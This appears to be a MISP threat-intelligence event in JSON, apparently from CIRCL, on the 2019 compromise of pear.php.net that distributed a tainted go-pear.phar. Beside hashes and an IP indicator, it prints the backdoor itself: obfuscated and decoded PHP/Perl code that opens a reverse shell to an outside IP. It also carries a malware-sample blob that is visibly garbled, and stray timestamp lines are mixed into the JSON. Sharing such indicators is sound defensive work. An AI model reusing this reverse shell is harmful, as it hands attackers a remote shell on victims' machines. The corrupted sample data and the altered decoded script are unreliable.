2023-04-21 13:25:09 +00:00
{
"Event" : {
"analysis" : "1" ,
"date" : "2019-01-21" ,
"extends_uuid" : "" ,
"info" : "Incident - pear.php.net - compromised and delivering malicious package" ,
"publish_timestamp" : "1548332640" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1548332586" ,
"uuid" : "5c45721d-de08-4fff-b9b0-168a02de0b81" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#004646" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0071c3" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0087e8" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#ffffff" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#203f00" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "circl:incident-classification=\"system-compromise\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#00aeae" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "ecsirt:intrusions=\"compromised\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0013bb" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "europol-incident:information-security=\"unauthorized-access\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0014c5" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "europol-incident:information-security=\"unauthorized-modification\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#004e5f" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "veris:security_incident=\"Confirmed\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
] ,
"Attribute" : [
{
"category" : "Artifacts dropped" ,
"comment" : "md5sum of the infected file" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1548055336" ,
"to_ids" : false ,
"type" : "md5" ,
"uuid" : "5c457328-f3c8-47bd-bfbc-201802de0b81" ,
"value" : "1e26d9dd3110af79a9595f1a77a82de7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1548332216" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49acb8-6624-4506-ba63-4b46950d210f" ,
"value" : "${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"ki\\x72\\x69\\x68\\x71\\x68\"]=\"st\\x72\";${${\"GLOBA\\x4c\\x53\"}[\"k\\x69ri\\x68\\x71\\x68\"]}=\"\\x75\\x73\\x65\\x20\\x53\\x6f\\x63\\x6b\\x65\\x74\\x3b\\x0a\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x73\\x74\\x61\\x72\\x74\\x65\\x64\\x22\\x3b\\x0a\\x24\\x68\\x6f\\x73\\x74\\x20\\x3d\\x20\\x22\\x31\\x30\\x34\\x2e\\x31\\x33\\x31\\x2e\\x31\\x35\\x34\\x2e\\x31\\x35\\x34\\x22\\x3b\\x0a\\x24\\x70\\x6f\\x72\\x74\\x20\\x3d\\x20\\x34\\x34\\x33\\x3b\\x0a\\x24\\x70\\x72\\x6f\\x74\\x6f\\x20\\x3d\\x20\\x67\\x65\\x74\\x70\\x72\\x6f\\x74\\x6f\\x62\\x79\\x6e\\x61\\x6d\\x65\\x28\\x22\\x74\\x63\\x70\\x22\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x50\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x20\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x2c\\x20\\x24\\x70\\x72\\x6f\\x74\\x6f\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x6d\\x79\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x20\\x3d\\x20\\x69\\x6e\\x65\\x74\\x5f\\x61\\x74\\x6f\\x6e\\x28\\x24\\x68\\x6f\\x73\\x74\\x29\\x3b\\x0a\\x69\\x66\\x20\\x28\\x21\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x70\\x61\\x63\\x6b\\x20\\x22\\x53\\x6e\\x41\\x34\\x78\\x38\\x22\\x2c\\x20\\x32\\x2c\\x20\\x24\\x70\\x6f\\x72\\x74\\x2c\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x6e\\x6f\\x74\\x20\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x65\\x64\\x22\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x7d\\x0a\\x69\\x66\\x20\\x28\\x21\\x66\\x6f\\x72\\x6b\\x28\\x20\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x63\\x68\\x69\\x6c\\x64\\x22\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x49\\x4e\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x4f\\x55\\x54\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x45\\x52\\x52\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x65\\x63\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x65\\x63\\x20\\x7b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x7d\\x20\\x22\\x2d\\x62\\x61\\x73\\x68\\x22\\x20\\x2e\\x20\\x22\\\\0\\x22\\x20\\x78\\x20\\x34\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x69\\x74\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x3b\\x0a\\x7d\";@exec(\"p\\x65\\x72\\x6c -e \\x27$str\\x27 \\x3e /dev/n\\x75ll\\x202\\x3e/de\\x76/\\x6e\\x75\\x6c\\x6c\");"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1548332586" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "5c49ae2a-3520-4dbb-bc74-4e04950d210f" ,
"value" : "104.131.154.154"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "Microblog post like a Twitter tweet or a post on a Facebook wall." ,
"meta-category" : "misc" ,
"name" : "microblog" ,
"template_uuid" : "8ec8c911-ddbe-4f5b-895b-fbff70c42a60" ,
"template_version" : "5" ,
"timestamp" : "1548056697" ,
"uuid" : "5c4572e1-8278-4d63-ba24-196a02de0b81" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "post" ,
"timestamp" : "1548055265" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c4572e1-5ae8-49cf-b341-196a02de0b81" ,
"value" : "A security breach has been found on the http://pear.php.net webserver, with a tainted go-pear.phar discovered. The PEAR website itself has been disabled until a known clean site can be rebuilt. A more detailed announcement will be on the PEAR Blog once it's back online."
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "type" ,
"timestamp" : "1548055266" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c4572e2-39b0-4a44-815e-196a02de0b81" ,
"value" : "Twitter"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "link" ,
"timestamp" : "1548056696" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "5c4572e2-6650-4473-bb22-196a02de0b81" ,
"value" : "https://twitter.com/pear/status/1086634389465956352"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "username" ,
"timestamp" : "1548055266" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c4572e2-5a7c-47bd-93db-196a02de0b81" ,
"value" : "pear"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1548055396" ,
"uuid" : "5c457364-db30-4c64-b462-299e02de0b81" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A O g 6 N U 6 L s m l 2 I k g J A G E B N w A g A B w A M W U y N m Q 5 Z G Q z M T E w Y W Y 3 O W E 5 N T k 1 Z j F h N z d h O D J k Z T d V V A k A A 2 R z R V x k c 0 V c d X g L A A E E I Q A A A A Q h A A A A r G x o A 5 q k 5 D l N Z F P G u q j L 4 O F S 3 e I X E M I O k H u k 6 C o J H o f a V L b X W u 82 t i / O Z e 7 X n / H a i g Q m K R f M Z 2 s Q N 5 G D H m 0 V F I H 3 l A d 3 P P W M d 3 M 5 b B 3 K v c P L v 8 p 9 k y i n 6 L t L l G x z b U f j 4 E I e M M J S B G 7 V m N U Z t 6 J h W 0 h X + 3 x B h N J r R 0 o + 1 m h c 6 i r h M H r / M R I d 12 q G i J p 9 z X V j 9 s x a d 746 F a 1 t E Y l m C V 7 L 7 x f 10 u U Y Y x C h l k m G f F U b d p D M U W F p Q C n N j y R 2 J d a q K D c M D W F j B z i V 1 C a L Q i U + l l W k 2 M k u s X x W Q r 94 u T 7 O 7 r W G k m 2 X J d i T u X r u z A Z G L 8 H J f t C 0 z B D F j I P 0 b e 5 z r Q 44 K 3 C P d g R d b 19 j m P m S M 0 Z u A u i K 9 / c o Q 2 t z E Z E G 0 q 206 Q I D U S r 1 I M c L m 4 u v 1 E W w t H V B 6E+8 K u s M d Q w 82 J I 2 c 4 c z v 56 Z y T J H v z Z s z q t e A t f j z J d a z u a s o e p e X e r 2 c T t p N I y 7 u C V d f d R u Z + R v I s b x D n K S g w 4 I d y Y Q B n 5 Q m Q d 5 R O 8 w z 8 N g T O f 4 i p Z M A 6 f I / 29 v A 3 C l P K N U 483 X 5 a 6 z S O h / n R s I B s a J 3 Y A Q H Z Y T r I 0 U R l N c K 9 Q P O Q Q c 3 p q 9 v 87 g v c / w 8 N 7 q r D I 4 d n z q I Y s g Q h C t y k 9 Y A R b + z w c 0 i I E 8 f h 6 g B Y C g T f 2 E X G U P f 7 j y 0 4 J W 9 U I l j j u / h s e j M c I j j E l W d T D L E y x E 93 s I 3 G D N O A j 4 y a a v k b E 0 2 u Y z h c U 8 Q a i 25 N b t K x 2 m B o 5 u G g 4 s Q D v A X k R Z 1 / 2 z r X d x r X q b Q Q L k F m K Z c X H u j g Y A U 3 l E v j n i 1 a C t U 7 z 6 g N 5 Z B A l t V P / H r G z g t F 6 w 532 d l J Z b 1 R 5 + M k r T f 3 f n F v 6 B f a t i h L 5 D R c h 8 s t p i c Q v J I g x b s n U c I h P 36 t K C U j 5 P v X q / W R W P g G 7 V h k b n 90 y P 12 J k Y q 1 B V h / N h q 7 r 5 u M f H D G O Y O 8 i j B y z b 548 + X 4 j Q / 9 q Z M W r V d c 6 v R l O Q S W B s J F t 7 g g m W u T a z v o f M F V C y P B P z I x l 9 F s G A k X L r k i J u L F e 8 I / 9 o 9 z x / Z j y 0 E F o F s b p C L c + T / 5 j x l v 10 Z h b S d f c 63 x L u r 9 W T 5 m a I 4 T a a C P R l c Z J Z a K m R S r u F y b N C M v r i H p 31 G G M 1 x I f z K E z U 3 c 2 w P M O b G S 82 e i W 6 L n k q w w U q g O m P b C P X T s P V h u B I F + M A f A i O h R I h Z K f x s s 5 i w A 4 c 5 M L w Z q e M h Q Y w K Y t x A 4 h z 7 y n Y P 6 e O D w Y V s r y x 1 w + P I M x E o L e R l Z e c K 6 H o X F r 4 W X N z H c J 7 z R 5 k K t E 6 P Q w d A P P K / X n P D N R Q b q X T n s o k 9 s k Z 8 E c D K 1 N i P g i k U s p D Z d E 1 S k T k e L U B O 5 A L e / 2 V D V u i u T A D E G 4 H E q P P w l H L H 2 A V q Y O A o 3 B 8 H t E X X V P c h i D D t o x z 2 v 6 h 7 H Z p K Z F k 37 S 0 N 31 V L Z z m h w H 0 s 2 z 4 n 35 r j p O c u c P p K 7 r q O Z 9 u X v a D A k b n X 5 M M P Y k B O b d d d u + c S w L S h E X R F I p C B v f w U f O P B M Q h c 3 f A s L N s B i J C M V X 1 I 37 I 0 z t + X 7 H R F v 9 E x + r T 2 L Q q T / K k k I b + 7 A F r t G m e f 8 v U i X t 87 n r N 3 N s 7 K j + C 5 H Y l 0 i Q p E X f o s b v f q p X n + 4 Q x L 9 Q A J Q m G + 4 G z l a l 9 g P d G H Y / 1 U L o b k + P f m 5 o j r r Z p W K i E E e F U 2 g 3 t F P o Q 3 P i E B W B U V F X / d N v N x G G J 8e7 s y m A 8 t S W l M D 5 Y T Y d I L Y M q f / 8 Y F k h m M e W b Q a I W d Z L M j p k H / 5 f 1 X 11 G s 5 G n x r 9 / W Q Z B a t F V d z F O N X B q l c 4 + v n E V Q z s 6 O d Y O J k d R o g R N s B J a Y c s J W U / n z P o d J P 2 K i F E B a J e l u P M G j j l 0 d K O v w a m l h c K W 0 T A m 0 0 m e m y s X B k 2 L d b A f / 5 U W M D S 1 m X 53 a J i z 839 v H W x e y h q + h x 1 T G i 7 Y U y j C s 0 M B m / d y p q / W g i V G K j T G q g l G Q G 66 v T c o c a 7 U m T s b / r 1 P m 3 E C e x N o m v f U X C v o b 3 w c w s t B U c C b / 2 d 0 7054 L t A Z 8 g 9 C q s Y w k V K a 64 o j q J q m b 1 i 4 d H 6 I G x V i N T O L 6 p 3 G 85 E O 3 g 46 O Y h L 8 o O q 4 B S T E X 4 x r 9 R J 3 i D y C + j g t l x + G o z 50 F a z a I C w F D d j X B i v O U B U V r r 6 G t z 3 b 6 J z V G 6e2 Q E B g b M V V h / r O a i I P V n P Z x M m w i w r s D A W w y K M J w t K O c 8 Q e N S q q X 9 + J H T 1 + B v c G N d w Y O u F y f + D + U N / J P 9 X 0 w H a m K H i e o L 9 y 5 s T B N 55 x n f 6 F 26 t p 0 H k 4 m J o N D J K h g I e Q u d 2 q P 4 J V 3 O u K R O i + 1 h Y 0 Z z e n q 1 l x q l Q b + h / O e T J h h 10 h F I I e S L 0 o A R 1 x / E W N r 0 7 n v y S m 4 q L 5 Z S P i c T q l 0 c P F + 2 o Y d Q m j u h u v y d 7 p j H C H T c a K 707 b M D u m C e a A c T M w g V M A Q T d 3 p g + X p k f 15 m U P 13 O y J F z j B W Y Y u + b 45 B K Z N r D m I 69 m 0 v + O n X c O d 5 t h g V Q 5 t T j D p k R S z b k Y u I S l E L a a R Z R I d L o D E G g p s g Z k L G Y A J H q a X B n X H g c 0 L a U F P V 1 + i 0 Z L 94 L e j G r S E q e Q w G W C 25 x N t h G i 20e1 t K 2 C K n V 7 U p t 7 V 7 j x L r Y a i f //RCL+MPubDSJ+eDHvPm2Hx01e2BmOMKrtTM7GWBw86etKatxm0I5mhmngR183kld3/edwLBUjilPr/XSLdBWrzU0wNZT31XwhhI/+6MFbrlso9h2tw8eN2I11priQcAsZOtUGrfhchmFfqVNdamsligXmpoKNXubQjvhg44wlgpiuOmAO/s+AZSK7BfPISa0dKKVD2kMnTpJTtdW7vImZYQAb+kGPSta7sRoYXAW6ZC3mxHpf+4CBaB208eCk+ltIW+N4t/nHETGDgCvWYXoMWTORjNI/KbTcLAAEPQuOUkggj71Bk4c4SYS8k5zf8GmwCVorGV3yr+8oHZsXHZXPjaJFriwk6Q8eS0lZJrTcfonr3VusYEZlVM2Ykr1vmymQXf4J6Gk1Uq9dGRFDX4VxZH2h4pZrxiqwDekmXHv9TsnzSAFQti/zF5Ym3Xu2nDAlco3v6ERQWAxoDtZiRRbz0kQcTSAhnsu1yQgZW46QT6FNkXiTqGs4zoyu8rgmf27uQs8yuxLEGTP8VfYA0F6aBHKtcm4AUGXELHG1mNodzI++DMt7G7NSLzz/7fE0TiSMMzb5+1+CWiHans70Iy3uAMNFxf+VoK8vE8pGng5497HIIZ/djvGQ707hUK1kuGpxEc9sTsRELRdxsNZ91+FqGrtHqwMOzU7aduijRwKrXu7fzlsTdDstcGDfgPNV8S66FRh9jtTkf77mpXWgK79HaBKfSsuU6JCuRJE+WRvvM6us/Bocoh6x6I1wIdaldlmWCyJD1MBYwJFnatmcbJx90UB4qCp/mou8pNdD81QHVMN8LXLDi6h881PLxhPfzzwxHWjDp8ZCa34OFldfyv+D4nrCPYXB7MWawMjAuKcJ7+NqmCi//k8jRO4pNV6JAKFvotWAM7cpuX2mcbsS97txqUgjhe+bFfGa7GlzP8CDXGStC4YYIeQLWQt3WV+jCizm9v7UJuPfFzbLtLgQX5l5mHTVFS8wnshMPibBSpsWZb1lIGkTFtbOzvNBeEr7TGdK7pd8xYlt4NSodr7bYqopWTLDROqo/BXbCbja1cyOVHu2R6um5OnbBZqYJPVy2lG8J6dWDEndJVPlJjIkj14emcwVuv8wYqh+33eKG6pOrgM8aiNyQXxh6wYJt01V/JYgGEO3jtQ8JdiehZhcrEfpGGXhWqL295TS00u3dMMw+Q0jhiLmTSKbYv+lgg6jPior9uQIswnTCEPrg0JEPzIFiyRLThX0MUYq+vK9YUlWWGwvgiSyfSaHAZrffmTDWewY0FEm29OWDJwa+NL3S47TvRQ8a7QxbgJzkSoN6PK/jLjYuESnvj8yvPE2iWU3aGYq3S3gFa+quT1KKU5EK701tx6UzRDa74Dvc7LTxzni62iq8pRkb1+sUFv33bava/ef2tTOPsiSDQ2kyL+F3xQO4nBvT8BxLpNVZdA2lSv0Ke8qK+u5IEQH/LI49Y+9GmF6lJQqJe5B09RU02V0LhdYD2g4prp7
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1548055397" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "5c457365-1d88-4a27-a43f-299e02de0b81" ,
"value" : "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8|1e26d9dd3110af79a9595f1a77a82de7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "filename" ,
"timestamp" : "1548055398" ,
"to_ids" : false ,
"type" : "filename" ,
"uuid" : "5c457366-e848-48cf-95e4-299e02de0b81" ,
"value" : "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1548055398" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "5c457366-e5bc-4f54-ba90-299e02de0b81" ,
"value" : "1e26d9dd3110af79a9595f1a77a82de7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1548055399" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "5c457367-38a4-4096-b771-299e02de0b81" ,
"value" : "5b913edb2917d6b85d929659ff833e401a5cc503"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1548055399" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5c457367-2018-4084-bb83-299e02de0b81" ,
"value" : "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1548055401" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "5c457369-0ad8-4031-a193-299e02de0b81" ,
"value" : "3604833"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts." ,
"meta-category" : "misc" ,
"name" : "script" ,
"template_uuid" : "6bce7d01-dbec-4054-b3c2-3655a19382e2" ,
"template_version" : "1" ,
"timestamp" : "1548332550" ,
"uuid" : "5c49ae06-c5a4-4838-a07e-4d35950d210f" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "script" ,
"timestamp" : "1548332550" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49ae06-6d90-4cbc-b5aa-4c31950d210f" ,
"value" : "${\"GLOBALS\"}[\"kirihqh\"]=\"str\";${${\"GLOBALS\"}[\"kirihqh\"]}=\"use Socket;\r\nprint \"started\";\r\n$host = \"104.131.154.154\";\r\n$port = 443;\r\n$proto = getprotobyname(\"tcp\") || \r\nsocket(SERVER, PF_INET, SOCK_STREAM, $proto) || \r\nmy $target = inet_aton($host);\r\nif (!connect(SERVER, pack \"SnA4x8\", 2, $port, $target)) {\r\n print \"not connected\";\r\n \r\n}\r\nif (!fork( )) {\r\n print \"child\";\r\n open(STDIN,\">&SERVER\");\r\n open(STDOUT,\">&SERVER\");\r\n open(STDERR,\">&SERVER\");\r\n print(\"exec\");\r\n exec {\"/bin/sh\"} \"-bash\\\\0\" x 4;\r\n print(\"exit\");\r\n \r\n}\";@exec(\"perl -e '$str' > /dev/null 2>/dev/null\");"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "language" ,
"timestamp" : "1548332552" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49ae08-5f08-4757-99c8-4776950d210f" ,
"value" : "PHP"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1548332552" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49ae08-4520-4f38-aeb9-452e950d210f" ,
"value" : "Malicious"
}
]
}
]
}
}